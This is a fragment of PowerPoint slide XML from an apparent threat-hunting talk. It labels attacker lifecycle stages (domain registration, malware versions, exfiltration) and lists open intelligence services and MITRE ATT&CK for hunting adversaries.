                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB6879EC-7F5A-48E8-BCA2-EB66E3B81F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5496907" y="6337018"/>
            <a:ext cx="2437266" cy="382308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1836" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inside victim network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D586A200-317D-23E3-3B52-2D9704E309B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="275269" y="3261247"/>
            <a:ext cx="2935845" cy="1218122"/>
            <a:chOff x="275269" y="3261247"/>
            <a:chExt cx="2935845" cy="1218122"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0725F8-4707-4170-9260-15ACB7A5D89D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="275269" y="3261247"/>
              <a:ext cx="2478466" cy="670445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1836" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Register new domain </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1836" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>for attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Straight Connector 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F152542-4D34-4B7C-8D31-D678888BF993}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2068218" y="3756463"/>
              <a:ext cx="1142896" cy="722906"/>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4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AD7E68-27BF-0732-E8E1-FBC72D49DB8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1558522" y="2194348"/>
            <a:ext cx="2295067" cy="1737344"/>
            <a:chOff x="1567666" y="2543888"/>
            <a:chExt cx="2295067" cy="1737344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="TextBox 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C14F8E-4B94-43AA-A496-92C2D2647441}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1567666" y="2543888"/>
              <a:ext cx="2041901" cy="958583"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1836" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Create new version of malware</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Connector 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67DE8C45-33BC-4208-8663-C510925115AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3139257" y="3432434"/>
              <a:ext cx="723476" cy="84879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9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF8D093-9F06-3B3B-375F-A6E0C7957A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5496907" y="1115937"/>
            <a:ext cx="2139502" cy="1168475"/>
            <a:chOff x="5496907" y="1115937"/>
            <a:chExt cx="2139502" cy="1168475"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F51BDB00-D4CE-43D9-AAFC-F45BBB3F6F1D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5496907" y="1115937"/>
              <a:ext cx="2139502" cy="657359"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1836" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Operate on victims from attacker infra</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="24" name="Straight Connector 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49396246-50E8-4E59-9E9E-1A2D386D6C68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="16" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6566658" y="1773296"/>
              <a:ext cx="0" cy="511116"/>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11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADAD2826-7F4D-4A10-47B8-3C072456996B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8404435" y="1257193"/>
            <a:ext cx="2671053" cy="1027219"/>
            <a:chOff x="8404435" y="1257193"/>
            <a:chExt cx="2671053" cy="1027219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCA397ED-5D45-4673-B2FF-BB3DD9205714}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8505010" y="1257193"/>
              <a:ext cx="2570478" cy="382308"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1836" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Maintain attacker infra</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Connector 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0046EB91-17C8-4BBE-93DA-980569BFD3B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8404435" y="1633878"/>
              <a:ext cx="512019" cy="65053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15" name="Group 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB1A8284-73F6-428E-D30D-6F1BB9DC5021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9149603" y="2770276"/>
            <a:ext cx="1730270" cy="1102473"/>
            <a:chOff x="9149603" y="2770276"/>
            <a:chExt cx="1730270" cy="1102473"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="TextBox 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8947CAA5-144F-42CF-BEEA-B2E979A6048A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9483328" y="2770276"/>
              <a:ext cx="1396545" cy="382308"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1836" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Gather exfil</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32" name="Straight Connector 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A1BBB1-C683-4408-B50C-4747291125C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="8" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9149603" y="3150848"/>
              <a:ext cx="644594" cy="721901"/>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6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB123D4D-33F5-B589-6340-C64E8ACF0BA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2313482" y="1213037"/>
            <a:ext cx="2842789" cy="2002033"/>
            <a:chOff x="2313482" y="1213037"/>
            <a:chExt cx="2842789" cy="2002033"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="TextBox 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E29C0CA-52F1-4A46-9A00-83D987779865}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2313482" y="1213037"/>
              <a:ext cx="2041901" cy="670445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1836" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Compromises new identity</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="Straight Connector 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7CBB44-F3B5-44F1-A9CE-FF58EC77E504}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3649149" y="1786682"/>
              <a:ext cx="1507122" cy="142838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itle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5147FF63-0421-198F-BEF9-8F01C23D3F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zoom Out…and hunt adversaries on their turf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF3F132-43A7-FD78-A086-EE214D24E016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="306610" y="6459242"/>
            <a:ext cx="3062510" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Also see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>PRE-ATT&amp;CK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC3E07B-D8D1-9299-D218-9A90BA5255D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9866228" y="3732032"/>
            <a:ext cx="2570247" cy="2975173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0"/>
              <a:t>Share intelligence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0"/>
              <a:t>Know your adversaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0"/>
              <a:t>Free / low cost hunting services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>VirusTotal / passivedns.mnemonic.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Centralops.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Whoisology.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Bgp.he.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Google Maps, Wikimapia.org </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>scans.io, crt.sh </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Shodan.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>URLScan.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Spur.us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1700"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Yara/Sigma rules on GitHub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1757274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52BD40-D12A-7196-CE3F-9B3A8BCD15B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hunting with Techniques one by one</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D76954-9354-28D9-3585-5FB2C94E1431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="306381" y="2279841"/>
            <a:ext cx="3270830" cy="3098756"/>
            <a:chOff x="5538624" y="1454322"/>
            <a:chExt cx="3270830" cy="3098756"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21AB5F1D-687B-3184-9E33-C8BCA2D50FC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect r="37977"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5538624" y="1751514"/>
              <a:ext cx="3270830" cy="280156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72D83CB-A406-3FC8-B757-2D2583019BB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5538624" y="1454322"/>
              <a:ext cx="3270830" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>MITRE ATT&amp;CK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80CBD3F4-3FF7-2495-3C84-7C9DC22FE500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="845243" y="3642231"/>
            <a:ext cx="461042" cy="122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9B787395-8CC5-1DD6-5D69-B7322D046E11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1711275" y="3493255"/>
            <a:ext cx="461042" cy="122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F6DAA12-BE39-688C-7BFC-5D322555D84F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2172317" y="3977815"/>
            <a:ext cx="461042" cy="122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5C32215-EBE8-7DC7-0F13-EB68CF45D22E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2172317" y="4397952"/>
